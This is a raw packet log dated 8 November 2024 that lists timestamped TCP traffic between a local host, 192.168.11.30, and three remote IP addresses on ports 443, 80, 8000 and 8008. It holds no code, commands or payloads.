                                                                                                                          Nov 8, 2024 10:59:46.769336939 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.770143032 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.770152092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.770318031 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.770461082 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.770467043 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.770795107 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.770806074 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.770916939 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.770924091 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.771007061 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.771096945 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.771817923 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.771826982 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.771960020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.772133112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.772138119 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.772326946 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.772337914 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.772474051 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.772478104 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.772537947 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.772736073 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.773364067 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.773380995 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.773519039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.773724079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.773730993 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.774214983 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.774228096 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.774441004 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.774447918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.774528980 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.775187016 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.775194883 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.775324106 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.775332928 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.775528908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.775990963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.776000023 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.776195049 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.776201963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.776297092 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.776747942 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.776762962 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.776946068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.776953936 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.777038097 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.777753115 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.777764082 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.777896881 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.777904987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.778079033 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.779649019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.779661894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.779779911 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.779854059 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.779977083 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.779984951 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.780025005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.780143023 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.780286074 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.780467987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.780479908 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.780653000 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.780818939 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.780824900 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.781029940 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.781052113 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.781064034 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.781224966 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.781325102 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.781331062 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.781574965 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.782265902 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.782278061 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.782406092 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.782453060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.782501936 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.782506943 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.782587051 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.782629967 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.782665014 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.782670975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.782810926 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.782862902 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.783004999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.783627033 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.783638954 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.783850908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.783859015 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.783981085 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.784032106 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.784554005 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.784565926 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.784709930 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.784709930 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.784806013 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.784806013 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.784811020 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.784904003 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.785073042 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.785708904 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.785722971 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.785902023 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.786009073 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.786015987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.786077976 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.786204100 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.786211014 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.786334038 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.786437988 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.787110090 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.787122011 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.787256956 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.787412882 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.787417889 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.787672997 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.788088083 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.788100004 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.788196087 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.788402081 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.788409948 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.789181948 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.789196968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.789402962 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.789412022 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.789467096 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.790035963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.790047884 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.790182114 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.790189981 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.790260077 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.790314913 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.790360928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.790369987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.790508032 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.790534019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.790625095 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.790807009 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:46.790815115 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:46.790870905 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:03.220031977 CET497578000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:03.407696962 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:03.407857895 CET497578000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:03.408015013 CET497578000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:03.645593882 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:04.166117907 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:04.166134119 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:04.166189909 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:04.166203976 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:04.166404963 CET497578000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:04.166574955 CET497578000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:04.354784966 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:04.355237961 CET497578000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:04.543031931 CET80004975723.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:04.543339014 CET497578000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:06.172034025 CET497588008192.168.11.30206.206.126.252
                                                                                                                          Nov 8, 2024 11:00:06.495608091 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:06.495846033 CET497588008192.168.11.30206.206.126.252
                                                                                                                          Nov 8, 2024 11:00:06.496418953 CET497588008192.168.11.30206.206.126.252
                                                                                                                          Nov 8, 2024 11:00:06.874650002 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:06.892200947 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:06.892215014 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:06.892256021 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:06.892378092 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:06.892400980 CET497588008192.168.11.30206.206.126.252
                                                                                                                          Nov 8, 2024 11:00:06.892437935 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:06.892532110 CET497588008192.168.11.30206.206.126.252
                                                                                                                          Nov 8, 2024 11:00:06.892868042 CET497588008192.168.11.30206.206.126.252
                                                                                                                          Nov 8, 2024 11:00:07.216222048 CET800849758206.206.126.252192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:07.216370106 CET497588008192.168.11.30206.206.126.252
                                                                                                                          Nov 8, 2024 11:00:10.998761892 CET4975280192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:11.101802111 CET8049752172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:11.102056026 CET4975280192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:18.919094086 CET497598000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:19.106364965 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:19.106518030 CET497598000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:19.106594086 CET497598000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:19.350533009 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:19.863357067 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:19.863383055 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:19.863392115 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:19.863430977 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:19.863586903 CET497598000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:20.050817966 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:20.105885983 CET497598000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:20.507518053 CET497598000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:20.694916010 CET80004975923.88.71.29192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:20.695303917 CET497598000192.168.11.3023.88.71.29
                                                                                                                          Nov 8, 2024 11:00:20.798686981 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:20.798712015 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:20.798872948 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:20.799071074 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:20.799076080 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.009835005 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.010582924 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:21.010587931 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.010968924 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:21.010972977 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.598181009 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.598217010 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.598234892 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.598256111 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.598572016 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:21.598578930 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.652493000 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:21.839826107 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.839871883 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.839895010 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.840173006 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:21.840186119 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.840297937 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.840332031 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.840553045 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:21.840557098 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.840781927 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:21.840787888 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:21.886836052 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.081958055 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.082158089 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.082181931 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.082321882 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.082482100 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.082492113 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.082699060 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.082699060 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.083117962 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.083161116 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.083303928 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.083698988 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.083714962 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.083909035 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.083918095 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.084101915 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.136782885 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.325887918 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.325917959 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326087952 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.326100111 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326152086 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326178074 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326327085 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.326333046 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326562881 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.326812983 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326833010 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326926947 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.326960087 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.326970100 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.327205896 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.327205896 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.327724934 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.328299999 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.328509092 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.328521013 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.328700066 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.328757048 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.328977108 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.328977108 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.328989983 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.329358101 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.568176031 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.568375111 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.568512917 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.568523884 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.568700075 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.568742990 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.568959951 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.569164991 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.569750071 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.569854021 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.569951057 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.569966078 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.570044041 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.570744038 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.570789099 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.571099997 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.571099997 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.571111917 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.571680069 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.571804047 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.572035074 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.572046041 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.572227001 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.572418928 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.809267044 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.809420109 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.809967041 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.810332060 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.810339928 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.810718060 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.810890913 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.811089993 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.811508894 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.811508894 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.811516047 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.811642885 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.811933994 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.812191963 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.812201977 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.812496901 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.812601089 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.812609911 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.812691927 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.812767982 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.813023090 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.813031912 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.813199997 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.813577890 CET44349760172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 11:00:22.813765049 CET49760443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 11:00:22.813774109 CET44349760172.67.137.62192.168.11.30
